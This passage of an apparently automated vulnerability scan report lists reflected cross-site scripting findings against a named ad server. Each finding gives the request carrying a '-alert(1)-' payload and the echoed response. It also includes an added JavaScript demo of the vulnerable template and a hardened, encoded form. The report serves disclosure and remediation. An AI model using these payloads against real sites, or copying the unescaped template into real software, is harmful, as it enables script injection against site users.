3.9. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 179a9'-alert(1)-'8bab3f5f0bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp179a9'-alert(1)-'8bab3f5f0bf/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 626
Date: Sat, 26 Feb 2011 00:19:28 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:28 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/manta.comp179a9'-alert(1)-'8bab3f5f0bf/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;
...[SNIP]...

3.10. http://a.collective-media.net/adj/manta.comp/energy_resources [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6850'-alert(1)-'345e4ad839d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resourcesf6850'-alert(1)-'345e4ad839d;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 626
Date: Sat, 26 Feb 2011 00:19:29 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:29 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/manta.comp/energy_resourcesf6850'-alert(1)-'345e4ad839d;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001
...[SNIP]...
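The pattern in the response above (REST path segments and tag parameters spliced raw into a single-quoted JavaScript string inside document.write) and a hardened form, as an added example. This is not code from the original report or from Collective Media: the server-side template modelled by renderAdTag, the parameter names handed to buildSrc, and the stubbed document/alert harness are assumptions made for the demonstration. The same string context recurs in 3.11 through 3.19, so the fix shown applies to all of them.

```javascript
// Added example (not code from the original report or from Collective Media):
// a minimal model of the ad-tag responder whose output appears above, a hardened
// form, and a harness that evaluates the emitted script with document.write and
// alert stubbed so the breakout is observable offline.

// Marker taken from the report's request for this issue (REST URL parameter 3).
const PAYLOAD = "f6850'-alert(1)-'345e4ad839d";

// Percent-encode a URL component. encodeURIComponent alone leaves ! ' ( ) *
// untouched, which is exactly the set the '-alert(1)-' payload relies on, so
// those are encoded too. The output contains only [A-Za-z0-9-_.~%], which is
// inert inside a single-quoted JS string literal and inside an HTML attribute.
function strictUriEncode(s) {
  return encodeURIComponent(s).replace(/[!'()*]/g,
    c => '%' + c.charCodeAt(0).toString(16).toUpperCase());
}

// Builds the script src: slotPath holds the /cmadj/<network>/<slot> REST
// segments, params the ';k=v' tag parameters (both attacker-influenced above).
// encode is applied to every segment, key and value.
function buildSrc(slotPath, params, encode) {
  const path = slotPath.map(encode).join('/');
  const kv = Object.entries(params)
    .map(([k, v]) => `${encode(k)}=${encode(v)}`).join(';');
  return `http://a.collective-media.net/cmadj/${path};${kv};`;
}

// Emits the JavaScript the server returns. With safe=false this is the
// vulnerable shape from the report: the URL lands inside a single-quoted
// string literal without any escaping.
function renderAdTag(slotPath, params, safe) {
  const src = buildSrc(slotPath, params, safe ? strictUriEncode : s => s);
  return [
    "var ifr = (self==top ? '' : 'env=ifr;');",
    `document.write('<scr'+'ipt language="javascript" src="${src}'+ifr+'ord1='+Math.floor(Math.random()*1000000)+'"></scr'+'ipt>');`,
  ].join('\n');
}

// Evaluates the emitted script the way a browser would, with document.write and
// alert replaced by recorders. self and top are passed as equal values so the
// tag is treated as a top-level (non-iframe) include.
function runAdTag(code) {
  const written = [], alerts = [];
  const doc = { write: s => written.push(String(s)) };
  new Function('document', 'alert', 'self', 'top', code)(doc, n => alerts.push(n), 1, 1);
  return { written, alerts };
}

// Constructed input mirroring the report's request: the payload sits at the
// end of the third path segment.
const slot = ['manta.comp', 'energy_resources' + PAYLOAD];
const params = { pos: 'top', sz: '1x1,728x90', cmn: 'mt' };

// Vulnerable: the literal is closed by the payload's quote, alert(1) fires while
// the src string is being assembled, and document.write receives "NaN...".
const unsafe = runAdTag(renderAdTag(slot, params, false));

// Hardened: the marker survives only as percent-encoded text inside the URL.
const hardened = runAdTag(renderAdTag(slot, params, true));

function demo() {
  return { unsafe, hardened };
}
```

The point worth taking from the hardened path is that percent-encoding with encodeURIComponent by itself would not have closed this hole, because the apostrophe and parentheses the payload depends on pass through it unchanged; the value has to be made safe for the JavaScript string literal it is written into, not just for the URL. The receiving ad server then sees percent-encoded segments and must decode them, which is the normal contract for URL components.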

3.11. http://a.collective-media.net/adj/manta.comp/energy_resources [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97420'-alert(1)-'8b2472a3796 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resources;k=waste+disposal;c=704%2B0154271761;pos=top;sz=300x250;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;dcopt=ist;tile=2;ord=9636399718001484?97420'-alert(1)-'8b2472a3796 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/manta/mads/generic.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea; apnx=1; nadp=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 670
Date: Sat, 26 Feb 2011 00:19:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:44 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
=300x250;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;dcopt=ist;tile=2;net=mt;ord=9636399718001484?97420'-alert(1)-'8b2472a3796;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.12. http://a.collective-media.net/adj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11c75'-alert(1)-'9ed8bcfa867 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484?&11c75'-alert(1)-'9ed8bcfa867=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 630
Date: Sat, 26 Feb 2011 00:19:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:27 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484?&11c75'-alert(1)-'9ed8bcfa867=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.13. http://a.collective-media.net/adj/manta.comp/energy_resources [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e66d'-alert(1)-'827aa445761 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;ord=9636399718001484?5e66d'-alert(1)-'827aa445761 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; dc=dc-sea; rdst12=1; dp2=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 627
Date: Sat, 26 Feb 2011 00:19:22 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc-sea; domain=collective-media.net; path=/; expires=Mon, 28-Mar-2011 00:19:22 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="ht
...[SNIP]...
=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484?5e66d'-alert(1)-'827aa445761;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.14. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b73f'-alert(1)-'409c7f48e56 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj4b73f'-alert(1)-'409c7f48e56/manta.comp/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:31 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:31 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:31 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:31 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:31 GMT
Content-Length: 8216

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("mt-38123617_1298679571","http://ad.doubleclick.net/adj4b73f'-alert(1)-'409c7f48e56/manta.comp/energy_resources;net=mt;u=,mt-38123617_1298679571,11e4f07c0988ac7,Miscellaneous,ex.11-bk.rdst2-cm.rdst12-cm.rdst11-cm.polit_l;;pos=top;cmw=owl;sz=1x1,728x90;pg=comp;sc=e33b9;cs=e00;as=r00;s
...[SNIP]...

3.15. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e702'-alert(1)-'a761657800e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp3e702'-alert(1)-'a761657800e/energy_resources;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:32 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:32 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:32 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:32 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:32 GMT
Content-Length: 8208

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("mt-14050729_1298679572","http://ad.doubleclick.net/adj/manta.comp3e702'-alert(1)-'a761657800e/energy_resources;net=mt;u=,mt-14050729_1298679572,11e4f07c0988ac7,Miscellaneous,ex.11-bk.rdst2-cm.rdst12-cm.rdst11-cm.polit_l;;pos=top;sz=1x1,728x90;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;
...[SNIP]...

3.16. http://a.collective-media.net/cmadj/manta.comp/energy_resources [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf5cf'-alert(1)-'a9747c5027c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resourcesbf5cf'-alert(1)-'a9747c5027c;pos=top;sz=1x1,728x90;cmn=mt;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resources;t=waste;t=disposal;t=refuse;t=systems;t=industrial;t=recovery;t=llc;tile=1;net=mt;ord=9636399718001484;ord1=980367;cmpgurl=http%253A//www.manta.com/c/mtl07lp/industrial-waste-recovery-llc? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:37 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:37 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:37 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:37 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:37 GMT
Content-Length: 8208

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("mt-67481131_1298679577","http://ad.doubleclick.net/adj/manta.comp/energy_resourcesbf5cf'-alert(1)-'a9747c5027c;net=mt;u=,mt-67481131_1298679577,11e4f07c0988ac7,Miscellaneous,ex.11-bk.rdst2-cm.rdst12-cm.rdst11-cm.polit_l;;pos=top;sz=1x1,728x90;pg=comp;sc=e33b9;cs=e00;as=r00;st=sc;ct=camden;s=n;t=energy;t=resour
...[SNIP]...

3.17. http://a.collective-media.net/cmadj/manta.comp/energy_resources [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 522e1'-alert(1)-'148a505a1cf was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;k=522e1'-alert(1)-'148a505a1cf HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/manta/mads/generic.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; apnx=1; nadp=1; blue=1; qcdp=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:20:32 GMT
Connection: close
Content-Length: 7273

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
a.createAndAttachAd("manta-99230702_1298679632","http://ad.doubleclick.net/adj/manta.comp/energy_resources;net=manta;u=,manta-99230702_1298679632,11e4f07c0988ac7,none,cm.rdst12-cm.rdst11-cm.polit_l;;k=522e1'-alert(1)-'148a505a1cf;contx=none;dc=w;btg=cm.rdst12;btg=cm.rdst11;btg=cm.polit_l?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.18. http://a.collective-media.net/cmadj/manta.comp/energy_resources [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c2b1'-alert(1)-'8f009f52149 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources?5c2b1'-alert(1)-'8f009f52149=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
